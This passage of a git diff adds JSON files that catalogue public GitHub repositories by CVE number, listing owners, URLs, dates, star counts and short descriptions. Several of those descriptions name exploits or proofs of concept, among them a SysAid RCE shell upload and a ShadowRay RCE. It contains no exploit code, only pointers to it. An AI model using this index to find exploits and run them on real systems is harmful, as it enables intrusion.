+ "name": "CVE-2023-47246",
+ "full_name": "rainbowhatrkn\/CVE-2023-47246",
+ "owner": {
+ "login": "rainbowhatrkn",
+ "id": 147452376,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147452376?v=4",
+ "html_url": "https:\/\/github.com\/rainbowhatrkn"
+ },
+ "html_url": "https:\/\/github.com\/rainbowhatrkn\/CVE-2023-47246",
+ "description": "exploit for cve-2023-47246 SysAid RCE (shell upload)",
+ "fork": false,
+ "created_at": "2023-11-22T08:13:51Z",
+ "updated_at": "2023-11-22T08:13:52Z",
+ "pushed_at": "2023-11-22T08:13:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 721999227,
+ "name": "CVE-2023-47246",
+ "full_name": "tucommenceapousser\/CVE-2023-47246",
+ "owner": {
+ "login": "tucommenceapousser",
+ "id": 129875733,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4",
+ "html_url": "https:\/\/github.com\/tucommenceapousser"
+ },
+ "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2023-47246",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-22T08:18:11Z",
+ "updated_at": "2023-11-24T03:09:53Z",
+ "pushed_at": "2023-11-23T05:07:50Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47355.json b/2023/CVE-2023-47355.json
new file mode 100644
index 0000000000..009961b303
--- /dev/null
+++ b/2023/CVE-2023-47355.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 712696330,
+ "name": "com.eypcnnapps.quickreboot",
+ "full_name": "actuator\/com.eypcnnapps.quickreboot",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/com.eypcnnapps.quickreboot",
+ "description": "CVE-2023-47355",
+ "fork": false,
+ "created_at": "2023-11-01T02:02:16Z",
+ "updated_at": "2024-02-02T02:41:58Z",
+ "pushed_at": "2023-11-01T02:41:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-47355"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47400.json b/2023/CVE-2023-47400.json
new file mode 100644
index 0000000000..dda8468259
--- /dev/null
+++ b/2023/CVE-2023-47400.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 748574391,
+ "name": "CVE-2023-47400",
+ "full_name": "LucasVanHaaren\/CVE-2023-47400",
+ "owner": {
+ "login": "LucasVanHaaren",
+ "id": 29121316,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29121316?v=4",
+ "html_url": "https:\/\/github.com\/LucasVanHaaren"
+ },
+ "html_url": "https:\/\/github.com\/LucasVanHaaren\/CVE-2023-47400",
+ "description": "Proof of Concept for the CVE-2023-47400",
+ "fork": false,
+ "created_at": "2024-01-26T09:35:47Z",
+ "updated_at": "2024-01-27T00:08:27Z",
+ "pushed_at": "2024-01-27T10:39:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-47400"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4741.json b/2023/CVE-2023-4741.json
new file mode 100644
index 0000000000..c839ffea0d
--- /dev/null
+++ b/2023/CVE-2023-4741.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 681486230,
+ "name": "CVE-2023-4741",
+ "full_name": "wudidike\/CVE-2023-4741",
+ "owner": {
+ "login": "wudidike",
+ "id": 76437404,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76437404?v=4",
+ "html_url": "https:\/\/github.com\/wudidike"
+ },
+ "html_url": "https:\/\/github.com\/wudidike\/CVE-2023-4741",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-22T06:00:57Z",
+ "updated_at": "2023-09-05T03:34:39Z",
+ "pushed_at": "2023-09-05T03:34:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47437.json b/2023/CVE-2023-47437.json
new file mode 100644
index 0000000000..e81cd1c43b
--- /dev/null
+++ b/2023/CVE-2023-47437.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 719240166,
+ "name": "CVE-2023-47437",
+ "full_name": "herombey\/CVE-2023-47437",
+ "owner": {
+ "login": "herombey",
+ "id": 106621172,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106621172?v=4",
+ "html_url": "https:\/\/github.com\/herombey"
+ },
+ "html_url": "https:\/\/github.com\/herombey\/CVE-2023-47437",
+ "description": "Vulnerability Disclosure",
+ "fork": false,
+ "created_at": "2023-11-15T18:55:03Z",
+ "updated_at": "2023-11-22T16:17:44Z",
+ "pushed_at": "2023-11-16T16:32:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47459.json b/2023/CVE-2023-47459.json
new file mode 100644
index 0000000000..21783168ad
--- /dev/null
+++ b/2023/CVE-2023-47459.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 717109074,
+ "name": "CVE-2023-47459",
+ "full_name": "aleksey-vi\/CVE-2023-47459",
+ "owner": {
+ "login": "aleksey-vi",
+ "id": 65017000,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65017000?v=4",
+ "html_url": "https:\/\/github.com\/aleksey-vi"
+ },
+ "html_url": "https:\/\/github.com\/aleksey-vi\/CVE-2023-47459",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-10T15:20:48Z",
+ "updated_at": "2023-11-10T15:20:49Z",
+ "pushed_at": "2023-11-10T15:31:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47460.json b/2023/CVE-2023-47460.json
new file mode 100644
index 0000000000..37f956521f
--- /dev/null
+++ b/2023/CVE-2023-47460.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 717115700,
+ "name": "CVE-2023-47460",
+ "full_name": "aleksey-vi\/CVE-2023-47460",
+ "owner": {
+ "login": "aleksey-vi",
+ "id": 65017000,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65017000?v=4",
+ "html_url": "https:\/\/github.com\/aleksey-vi"
+ },
+ "html_url": "https:\/\/github.com\/aleksey-vi\/CVE-2023-47460",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-10T15:38:01Z",
+ "updated_at": "2023-11-11T13:03:29Z",
+ "pushed_at": "2023-11-10T18:45:47Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47464.json b/2023/CVE-2023-47464.json
new file mode 100644
index 0000000000..6d89709e83
--- /dev/null
+++ b/2023/CVE-2023-47464.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 757485554,
+ "name": "CVE-2023-47464",
+ "full_name": "HadessCS\/CVE-2023-47464",
+ "owner": {
+ "login": "HadessCS",
+ "id": 102136070,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102136070?v=4",
+ "html_url": "https:\/\/github.com\/HadessCS"
+ },
+ "html_url": "https:\/\/github.com\/HadessCS\/CVE-2023-47464",
+ "description": "CVE-2023-47464 POC",
+ "fork": false,
+ "created_at": "2024-02-14T15:39:34Z",
+ "updated_at": "2024-02-27T15:19:30Z",
+ "pushed_at": "2024-02-14T15:43:30Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47488.json b/2023/CVE-2023-47488.json
new file mode 100644
index 0000000000..10a2f3f402
--- /dev/null
+++ b/2023/CVE-2023-47488.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 719187938,
+ "name": "CVE-2023-47488",
+ "full_name": "nitipoom-jar\/CVE-2023-47488",
+ "owner": {
+ "login": "nitipoom-jar",
+ "id": 149907798,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4",
+ "html_url": "https:\/\/github.com\/nitipoom-jar"
+ },
+ "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-47488",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-15T16:32:01Z",
+ "updated_at": "2023-11-15T16:47:44Z",
+ "pushed_at": "2023-11-15T16:47:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47489.json b/2023/CVE-2023-47489.json
new file mode 100644
index 0000000000..45efe46a74
--- /dev/null
+++ b/2023/CVE-2023-47489.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 719177600,
+ "name": "CVE-2023-47489",
+ "full_name": "nitipoom-jar\/CVE-2023-47489",
+ "owner": {
+ "login": "nitipoom-jar",
+ "id": 149907798,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4",
+ "html_url": "https:\/\/github.com\/nitipoom-jar"
+ },
+ "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-47489",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-15T16:07:02Z",
+ "updated_at": "2023-11-15T16:26:32Z",
+ "pushed_at": "2023-11-15T16:48:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47504.json b/2023/CVE-2023-47504.json
new file mode 100644
index 0000000000..69c94e04fd
--- /dev/null
+++ b/2023/CVE-2023-47504.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 817443436,
+ "name": "CVE-2023-47504-POC",
+ "full_name": "davidxbors\/CVE-2023-47504-POC",
+ "owner": {
+ "login": "davidxbors",
+ "id": 22767204,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22767204?v=4",
+ "html_url": "https:\/\/github.com\/davidxbors"
+ },
+ "html_url": "https:\/\/github.com\/davidxbors\/CVE-2023-47504-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-19T18:07:56Z",
+ "updated_at": "2024-06-23T13:34:47Z",
+ "pushed_at": "2024-06-19T18:54:37Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47529.json b/2023/CVE-2023-47529.json
new file mode 100644
index 0000000000..044696dd15
--- /dev/null
+++ b/2023/CVE-2023-47529.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 718085174,
+ "name": "CVE-2023-47529",
+ "full_name": "RandomRobbieBF\/CVE-2023-47529",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-47529",
+ "description": "Cloud Templates & Patterns collection <= 1.2.2 - Sensitive Information Exposure via Log File",
+ "fork": false,
+ "created_at": "2023-11-13T10:50:25Z",
+ "updated_at": "2023-11-15T00:30:33Z",
+ "pushed_at": "2023-11-13T10:51:54Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47564.json b/2023/CVE-2023-47564.json
new file mode 100644
index 0000000000..7818c8a191
--- /dev/null
+++ b/2023/CVE-2023-47564.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 752666257,
+ "name": "CVE-2023-47564",
+ "full_name": "C411e\/CVE-2023-47564",
+ "owner": {
+ "login": "C411e",
+ "id": 35147719,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35147719?v=4",
+ "html_url": "https:\/\/github.com\/C411e"
+ },
+ "html_url": "https:\/\/github.com\/C411e\/CVE-2023-47564",
+ "description": "CVE-2023-47564",
+ "fork": false,
+ "created_at": "2024-02-04T13:25:58Z",
+ "updated_at": "2024-02-05T08:16:00Z",
+ "pushed_at": "2024-02-05T08:20:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "hacking",
+ "pentesting"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4762.json b/2023/CVE-2023-4762.json
new file mode 100644
index 0000000000..3a3a854c32
--- /dev/null
+++ b/2023/CVE-2023-4762.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 697220206,
+ "name": "CVE-2023-4762",
+ "full_name": "buptsb\/CVE-2023-4762",
+ "owner": {
+ "login": "buptsb",
+ "id": 666724,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/666724?v=4",
+ "html_url": "https:\/\/github.com\/buptsb"
+ },
+ "html_url": "https:\/\/github.com\/buptsb\/CVE-2023-4762",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-27T09:43:20Z",
+ "updated_at": "2024-05-23T08:04:47Z",
+ "pushed_at": "2023-09-27T10:39:47Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 697340903,
+ "name": "CVE-2023-4762-Code-Review",
+ "full_name": "sherlocksecurity\/CVE-2023-4762-Code-Review",
+ "owner": {
+ "login": "sherlocksecurity",
+ "id": 52328067,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52328067?v=4",
+ "html_url": "https:\/\/github.com\/sherlocksecurity"
+ },
+ "html_url": "https:\/\/github.com\/sherlocksecurity\/CVE-2023-4762-Code-Review",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-27T14:29:43Z",
+ "updated_at": "2023-09-27T15:13:59Z",
+ "pushed_at": "2023-09-27T14:30:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47668.json b/2023/CVE-2023-47668.json
new file mode 100644
index 0000000000..5b44e958d9
--- /dev/null
+++ b/2023/CVE-2023-47668.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 718515517,
+ "name": "CVE-2023-47668",
+ "full_name": "RandomRobbieBF\/CVE-2023-47668",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-47668",
+ "description": "Restrict Content <= 3.2.7 - Information Exposure via legacy log file",
+ "fork": false,
+ "created_at": "2023-11-14T08:40:49Z",
+ "updated_at": "2023-11-14T08:40:50Z",
+ "pushed_at": "2023-11-14T08:41:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4771.json b/2023/CVE-2023-4771.json
new file mode 100644
index 0000000000..0bfb08e9f2
--- /dev/null
+++ b/2023/CVE-2023-4771.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 812954720,
+ "name": "CVE-2023-4771",
+ "full_name": "sahar042\/CVE-2023-4771",
+ "owner": {
+ "login": "sahar042",
+ "id": 49879157,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49879157?v=4",
+ "html_url": "https:\/\/github.com\/sahar042"
+ },
+ "html_url": "https:\/\/github.com\/sahar042\/CVE-2023-4771",
+ "description": "CVE-2023-4771 PoC CKEditor 4 Cross-site scripting (XSS) vulnerability in AJAX sample",
+ "fork": false,
+ "created_at": "2024-06-10T08:19:24Z",
+ "updated_at": "2024-06-10T11:24:25Z",
+ "pushed_at": "2024-06-10T11:24:22Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47840.json b/2023/CVE-2023-47840.json
new file mode 100644
index 0000000000..84efeb4a20
--- /dev/null
+++ b/2023/CVE-2023-47840.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 725279708,
+ "name": "CVE-2023-47840",
+ "full_name": "RandomRobbieBF\/CVE-2023-47840",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-47840",
+ "description": "Qode Essential Addons <= 1.5.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation\/Activation",
+ "fork": false,
+ "created_at": "2023-11-29T20:14:39Z",
+ "updated_at": "2023-12-08T15:43:36Z",
+ "pushed_at": "2023-11-29T20:17:49Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47882.json b/2023/CVE-2023-47882.json
new file mode 100644
index 0000000000..ab4905a1ef
--- /dev/null
+++ b/2023/CVE-2023-47882.json
@@ -0,0 +1,35 @@
+[
+ {
+ "id": 714795483,
+ "name": "yi",
+ "full_name": "actuator\/yi",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/yi",
+ "description": "CVE-2023-47882 | CVE-2024-23727",
+ "fork": false,
+ "created_at": "2023-11-05T20:37:24Z",
+ "updated_at": "2024-03-24T16:26:09Z",
+ "pushed_at": "2024-03-24T16:16:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-47882",
+ "cve-2024-23727"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47883.json b/2023/CVE-2023-47883.json
new file mode 100644
index 0000000000..76af4de65b
--- /dev/null
+++ b/2023/CVE-2023-47883.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 692875423,
+ "name": "com.altamirano.fabricio.tvbrowser",
+ "full_name": "actuator\/com.altamirano.fabricio.tvbrowser",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/com.altamirano.fabricio.tvbrowser",
+ "description": "CVE-2023-47883",
+ "fork": false,
+ "created_at": "2023-09-17T21:01:22Z",
+ "updated_at": "2024-01-16T17:22:16Z",
+ "pushed_at": "2024-01-17T02:34:41Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-47883"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47889.json b/2023/CVE-2023-47889.json
new file mode 100644
index 0000000000..2e9ad82afe
--- /dev/null
+++ b/2023/CVE-2023-47889.json
@@ -0,0 +1,35 @@
+[
+ {
+ "id": 712680513,
+ "name": "com.bdrm.superreboot",
+ "full_name": "actuator\/com.bdrm.superreboot",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/com.bdrm.superreboot",
+ "description": "CVE-2023-47889 | CVE-2023-47354",
+ "fork": false,
+ "created_at": "2023-11-01T00:57:11Z",
+ "updated_at": "2024-02-02T02:40:30Z",
+ "pushed_at": "2023-11-01T01:12:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-47354",
+ "cve-2023-47889"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4800.json b/2023/CVE-2023-4800.json
new file mode 100644
index 0000000000..32180f098e
--- /dev/null
+++ b/2023/CVE-2023-4800.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 695846229,
+ "name": "CVE-2023-4800",
+ "full_name": "b0marek\/CVE-2023-4800",
+ "owner": {
+ "login": "b0marek",
+ "id": 144051679,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4",
+ "html_url": "https:\/\/github.com\/b0marek"
+ },
+ "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4800",
+ "description": "Repository for CVE-2023-4800 vulnerability. ",
+ "fork": false,
+ "created_at": "2023-09-24T12:11:58Z",
+ "updated_at": "2023-09-24T12:11:59Z",
+ "pushed_at": "2023-09-24T12:18:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48022.json b/2023/CVE-2023-48022.json
new file mode 100644
index 0000000000..ef11b9118b
--- /dev/null
+++ b/2023/CVE-2023-48022.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 741317419,
+ "name": "CVE-2023-48022",
+ "full_name": "0x656565\/CVE-2023-48022",
+ "owner": {
+ "login": "0x656565",
+ "id": 84010223,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84010223?v=4",
+ "html_url": "https:\/\/github.com\/0x656565"
+ },
+ "html_url": "https:\/\/github.com\/0x656565\/CVE-2023-48022",
+ "description": "CVE-2023-48022 exploit modified from Bishop Fox work",
+ "fork": false,
+ "created_at": "2024-01-10T06:26:01Z",
+ "updated_at": "2024-03-28T17:24:01Z",
+ "pushed_at": "2024-01-10T06:33:04Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 779214530,
+ "name": "ShadowRay-RCE-PoC-CVE-2023-48022",
+ "full_name": "jakabakos\/ShadowRay-RCE-PoC-CVE-2023-48022",
+ "owner": {
+ "login": "jakabakos",
+ "id": 42498816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4",
+ "html_url": "https:\/\/github.com\/jakabakos"
+ },
+ "html_url": "https:\/\/github.com\/jakabakos\/ShadowRay-RCE-PoC-CVE-2023-48022",
+ "description": "ShadowRay RCE POC (CVE-2023-48022)",
+ "fork": false,
+ "created_at": "2024-03-29T09:54:31Z",
+ "updated_at": "2024-06-06T11:58:39Z",
+ "pushed_at": "2024-04-02T06:35:40Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48028.json b/2023/CVE-2023-48028.json
new file mode 100644
index 0000000000..af5dbdbfa8
--- /dev/null
+++ b/2023/CVE-2023-48028.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 719728314,
+ "name": "CVE-2023-48028",
+ "full_name": "nitipoom-jar\/CVE-2023-48028",
+ "owner": {
+ "login": "nitipoom-jar",
+ "id": 149907798,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4",
+ "html_url": "https:\/\/github.com\/nitipoom-jar"
+ },
+ "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48028",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-16T19:22:30Z",
+ "updated_at": "2023-12-07T17:11:21Z",
+ "pushed_at": "2023-11-16T19:32:54Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
